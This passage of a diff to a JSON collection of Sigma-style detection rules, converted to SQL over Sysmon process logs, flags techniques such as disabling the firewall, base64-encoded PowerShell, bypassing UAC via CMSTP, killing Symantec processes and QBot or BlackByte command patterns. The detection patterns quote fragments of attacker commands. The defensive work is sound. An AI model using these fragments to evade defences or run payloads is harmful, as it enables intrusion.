= 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_parent_explorer.yml" + "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" }, { - "title": "Filter Driver Unloaded Via Fltmc.EXE", - "id": "4931188c-178e-4ee7-a348-39e8a7a56821", + "title": "Firewall Disabled via Netsh.EXE", + "id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", "status": "test", - "description": "Detect filter driver unloading activity via fltmc.exe", - "author": "Nasreddine Bencherchali", + "description": "Detects netsh commands that turns off the Windows firewall", + "author": "Fatih Sirin", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.t1562.004", + "attack.s0108" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%opmode%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%state%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fltmc_unload_driver.yml" + "filename": 
"proc_creation_win_netsh_fw_disable.yml" }, { - "title": "Curl.EXE Execution With Custom UserAgent", - "id": "3286d37a-00fd-41c2-a624-a672dcd34e60", + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", "status": "test", - "description": "Detects execution of curl.exe with custom useragent options", - "author": "frack113", + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.001" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (Image LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_curl_useragent.yml" + "filename": "proc_creation_win_susp_calc.yml" }, { - "title": "WhoAmI as Parameter", - "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "title": "Suspicious Rundll32 Invoking Inline VBScript", + "id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", "status": "test", - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", + "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_whoami_as_param.yml" + "filename": "proc_creation_win_rundll32_inline_vbs.yml" }, { - "title": "Read Contents From Stdin Via Cmd.EXE", - "id": "241e802a-b65e-484f-88cd-c2dc10f9206d", + "title": "Suspicious Sysmon as Execution Parent", + "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", "status": "experimental", - "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.003" - ], + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. 
CVE-2022-41120)", + "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%<%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE 'wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_stdin_redirect.yml" + "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" }, { - "title": "Potential Credential Dumping Via WER", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", + "title": "Use of Setres.exe", + "id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", "status": "experimental", - "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", - "author": "@pbssubhash , Nasreddine Bencherchali", + "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", + "author": "@gott_cyber", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - 
"Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." + "Legitimate usage of Setres" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\setres.exe' ESCAPE '\\' AND Image LIKE '%\\\\choice' ESCAPE '\\')" ], - "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" + "filename": "proc_creation_win_lolbin_setres.yml" }, { - "title": "Suspicious Reg Add BitLocker", - "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", - "status": "experimental", - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "title": "Rundll32 Registered COM Objects", + "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "status": "test", + "description": "load malicious registered COM objects", "author": "frack113", "tags": [ - "attack.impact", - "attack.t1486" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' 
AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_bitlocker.yml" + "filename": "proc_creation_win_rundll32_registered_com_objects.yml" }, { - "title": "Unusual Child Process of dns.exe", - "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", - "status": "experimental", - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\'))" + "SELECT * 
FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dns_susp_child_process.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" }, { - "title": "Potential BlackByte Ransomware Activity", - "id": "999e8307-a775-4d5f-addc-4855632335be", + "title": "Regsvr32 Command Line Without DLL", + "id": "50919691-7302-437f-8e10-1fe088afa145", "status": "test", - "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1574", + "attack.execution" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR 
CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" ], - "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" + "filename": "proc_creation_win_regsvr32_no_dll.yml" }, { - "title": "Potential Suspicious Windows Feature Enabled - ProcCreation", - "id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", + "title": "Write Protect For Storage Disabled", + "id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", "status": "experimental", - "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", + "author": "Sreeman", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate usage of the features listed in the rule." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND CommandLine LIKE '%-Online%' ESCAPE '\\' AND CommandLine LIKE '%-FeatureName%' ESCAPE '\\' AND (CommandLine LIKE '%TelnetServer%' ESCAPE '\\' OR CommandLine LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR CommandLine LIKE '%TFTP%' ESCAPE '\\' OR CommandLine LIKE '%SMB1Protocol%' ESCAPE '\\' OR CommandLine LIKE '%Client-ProjFS%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\system\\\\currentcontrolset\\\\control%' ESCAPE '\\' AND CommandLine LIKE '%write protection%' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\' AND (CommandLine LIKE '%storage%' ESCAPE '\\' OR CommandLine LIKE '%storagedevicepolicies%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" + "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml" }, { - "title": "Suspicious WindowsTerminal Child Processes", - "id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", - "status": "experimental", - "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Application Whitelisting Bypass via Dxcap.exe", + "id": "60f16a96-db70-42eb-8f76-16763e333590", + "status": "test", + "description": "Detects execution of of Dxcap.exe", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Other 
legitimate \"Windows Terminal\" profiles" + "Legitimate execution of dxcap.exe by legitimate user" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WindowsTerminal.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wt.exe' ESCAPE '\\') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\csc.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% iex %' ESCAPE '\\' OR CommandLine LIKE '% icm%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%Import-Module%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft.VisualStudio.DevShell.dll%' ESCAPE '\\' AND CommandLine LIKE '%Enter-VsDevShell%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.WindowsTerminal\\_%' ESCAPE '\\' AND CommandLine LIKE '%\\\\LocalState\\\\settings.json%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Common7\\\\Tools\\\\VsDevCmd.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DXCap.exe' ESCAPE '\\' OR OriginalFileName = 'DXCap.exe') AND CommandLine 
LIKE '% -c %' ESCAPE '\\')" ], - "filename": "proc_creation_win_windows_terminal_susp_children.yml" + "filename": "proc_creation_win_lolbin_susp_dxcap.yml" }, { - "title": "Suspicious HWP Sub Processes", - "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "title": "Base64 Encoded PowerShell Command Detected", + "id": "e32d4572-9826-4738-b651-95fa63747e8a", "status": "test", - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative script libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND Image LIKE '%\\\\gbb.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hwp_exploits.yml" + "filename": "proc_creation_win_powershell_frombase64string.yml" }, { - "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "title": "Bypass UAC via CMSTP", + "id": "e66779cc-383e-4224-a3a4-267eeb585c40", "status": "test", - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "description": "Detect commandline usage of Microsoft Connection Manager Profile 
Installer (cmstp.exe) to install specially formatted local .INF files", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002", + "attack.t1218.003" ], "falsepositives": [ - "Unlikely" + "Legitimate use of cmstp.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_reg_loader.yml" + "filename": "proc_creation_win_uac_bypass_cmstp.yml" }, { - "title": "HackTool - PCHunter Execution", - "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "status": "experimental", - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "Potential QBot Activity", + "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", + 
"status": "stable", + "description": "Detects potential QBot activity by looking for process executions used previously by QBot", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.005" + ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE 
'\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_pchunter.yml" + "filename": "proc_creation_win_malware_qbot.yml" }, { - "title": "Taskkill Symantec Endpoint Protection", - "id": "4a6713f6-3331-11ed-a261-0242ac120002", - "status": "experimental", - "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", + "title": "Terminal Service Process Spawn", + "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "status": "test", + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR Image LIKE 
'%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (Image = '')))" ], - "filename": "proc_creation_win_taskkill_sep.yml" + "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" }, { - "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", - "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "title": "Use NTFS Short Name in Image", + "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1564.004" ], "falsepositives": [ - "Some legitimate apps use this, but limited." 
